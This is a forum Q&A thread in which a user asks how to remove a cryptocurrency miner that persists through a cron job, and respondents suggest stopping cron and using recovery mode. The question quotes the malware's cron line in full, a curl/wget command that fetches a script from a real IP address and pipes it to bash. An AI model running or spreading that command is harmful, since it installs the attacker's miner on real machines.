0

Hello everyone, My machine has been hijacked by a bitcoin miner. he has a cron job that runs every 2 seconds. Using crontab -e to delete it doesn't work because it respawns soon after. I can't edit it with either nano or vi editor because each time I try he has some code running that kills the either editor as soon as I open them. Below is his cron job:

*/30 * * * *    (curl -s http://192.210.175.103/mr.sh||wget -q -O - http://192.210.175.103/mr.sh)|bash -sh

The job is being run from /tmp but the originating file keeps changing. Please any ideas on how to fix this? Thanks

user359287
  • 1

2 Answers2

0

You could disconnect from the internet, stop cron

sudo /etc/init.d/crond stop

and then edit the cronjob.

MaxGyver
  • 309
0

This is hard to answer precisely without more knowledge of the offending script, but a general tip is to reboot your system into single-user mode or recovery mode, which disables most daemons and gives you a root prompt to resolve the issues.

This wiki entry from Ubuntu explains the procedure in Ubuntu. For your problem, the most attractive feature of recovery mode is that it mounts the filesystem read-only. That means you will be able to search for the offending code before it is able to propagate and hide anywhere. When you have found the problem, remount in read-write mode and purge it from the system.

pusillanimous
  • 236
  • 1
  • 5
  • How would you know that the cronjob is the only thing modified on the system? – Kusalananda Jun 24 '19 at 09:57
  • Of course, you won't. But I interpreted the original question to imply that the miner script has not escalated privileges – it just runs a script as the user, in the user's crontab. If so, this procedure would work. Obviously, there might also be other kinds of infections going on. Either way it's advisable to begin the troubleshooting with removing the known offender, and see if that fixes it. – pusillanimous Jun 24 '19 at 10:03